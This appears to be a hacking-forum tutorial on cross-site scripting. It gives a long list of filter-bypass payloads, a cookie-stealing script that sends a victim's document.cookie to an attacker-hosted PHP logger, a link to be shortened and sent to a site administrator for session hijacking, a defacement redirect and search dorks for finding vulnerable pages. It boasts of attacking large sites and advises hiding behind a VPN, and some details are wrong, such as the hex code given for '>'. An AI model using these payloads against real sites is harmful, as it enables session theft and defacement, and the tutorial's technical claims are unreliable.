XSS Attack

What is XSS?

 

XSS stands for Cross-Site-Scripting. It is basically an attack, that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into download a virus that you've created. Such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also setup a Cookie-Stealer/Logger. Anything you can do with HTML, can be used against a site with this attack. I will explain some of the most important terms associated with XSS.

 

What is HTML and Javascript?

 

HTML

HTML is sort of like a programming language. The distinctions between a programming language, and HTML, are not too far apart. They are both languages, that are used to create attributes, and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML. 

Javascript

Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java, is a language that ressembles to C++, it can be used in games, and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages than HTML is. Javascript is used, more in applications outside of webpages. Like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic.

Code:

<script>alert("XSS")</script>

That little script, is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter, is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes, these filters are very weak, and can be by-passed very easily, other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blockin the alert. Here's an example of this kind of filter:
 

Code:

<script>alert("XSS")</script>

>

Code:

<script>alert( > XSS DETECTED < )</script>

Code:

String.fromCharCode(88,83,83)

Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like:
 

Code:

<script>alert(String.fromCharCode(88,83,83))</script>

 

You do NOT need ANY quotes in the simple query like that. So lets put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get any alert box, try some of these queries that I like to use:

Code:

"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))

Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes, you should create some too, they can come in handy a lot.
 

XSS: Advanced Methods

Now, in this section I will be sharing some ways to use XSS maliciously against a site. Now, keep in mind all malicious attacks sent over to a system, site, or server, is illegal and you CAN be prosecuted for these actions. So ALWAYS use protection if you're planning on doing something malicious to the site. If you want to make a little alert box pop up, you shouldn't need a Proxy/VPN.

Cookie Stealing/Logging

Now, cookie stealing is about the most malicious thing we can do with Non-Persistent XSS. A cookie stealer/logger, will log the cookies of the user who access the page to a certain document. The easiest way to do this, would be with a three step process.

First, you should setup a site. Personally, I findhttp://www.000webhost.com the best for upload malicious code, programs, or anything else. So go ahead and register there.

Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log, into our Cookie Log. Add this code, into it (Just make sure the file name has .php, or else it will not run the PHP code.

Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin :). To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too.

To Tiny the URL, go to http://www.spam.com/ and just put in the URL. But hold one, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging.
 

Code:

<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

So just add that script after the URL, then tiny it, and send it to our Web-Admin, now this can take some time for the Admin to actually click it. Sometimes, the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it. 

Once you get the cookie, you can use "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrators session. I find Cookie Manager a very useful app for XSS, make sure to download it. 

Defacing

Defacing is one of the most common things people like to do when they have access to multiple administrator options. Mostly so that they can advertise themselves, and simply let the administrator know that their security has been breached. Anyways, defacing with XSS requires persistent XSS, maybe a comment box, or something. You can use this script to create a re-direct to your deface page (You should probably redirect it to your deface on Pastehtml.com, because it's anonymous uploading.)

Code:

<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>

 

XSS: Onmouseover

Onmousover isn't a very exploitable vulnerability. But yet, it is still considered XSS. An onmouseover vulnerability would look something like this:

Code:

onmouseover=prompt1337

We can exploit this, by editing it to:

Code:

onmouseover=alert("XSS")

Very basic vulnerability, but it's getting more noticed, and patched in a lot more websites. Most sites will use Adobe Flash or CSS to do those kind of effects now.


XSS Filter Bypassing Techniques

Sometimes a simple XSS query just won't do the trick. The reason your query isn't working, is because the website has a WAF or Filter set in place. A filter will block as many XSS and SQLi queries as possible. In this case, we're dealing with XSS.

There are many ways on bypassing XSS filters, but I will only explain a few.



Hex Bypassing

With blocked characters like >, <, and /, it is quite difficult to execute an XSS query. Not to worry, there's always a solution :) You can change your characters, into Hex. A Hex of a certain character, is basically the character, but in a different format. These should help you out:

> = %3c 
< = %3c 
/ = %2f



ASCII Bypassing

With an ASCII encryption, we can use the character ". Which is blocked quite a bit. This is one of the most common XSS Filter bypasses of all time. A script that you would need to encrypt, would look like this:

NOT WORKING SCRIPT

Code:

<script>alert("XSS")</script>

WORKING SCRIPT

Code:

<script>alert(String.fromCharCode(88,83,83))</script>

To encrypt your little part of a script, go to this site:http://www.wocares.com/noquote.php I use that site, and find it quite useful.



Case-Sensitive Bypassing

This kind of bypass rarely works, but it's always worth a shot. Some filters are set in place to detect certain strings, however, the filter's strings that are blocked are CASE SENSITIVE. So all we need to do, is execute a script, with different sizes of characters. This bypass, would look like this:

Code:

<ScRiPt>aLeRt("XSS")</ScRiPt>

You can also mix that with ASCII encryption if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones. 
 

Some XSS Dorks

It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share:

Code:

inurl:search.php?
inurl:find.php?
inurl:search.html
inurl:find.html
inurl:search.aspx
inurl:find.aspx

Those dorks are about as basic as they can get, sorry if they do not satisfy you. I rarely use dorks, and with this tutorial you shouldn't need to use dorks to find a vulnerable site. XSS is a very popular vulnerability. XSS isn't a very high-priority, at least not Non-Persistent.

By Rahul Developers

Share this

Comments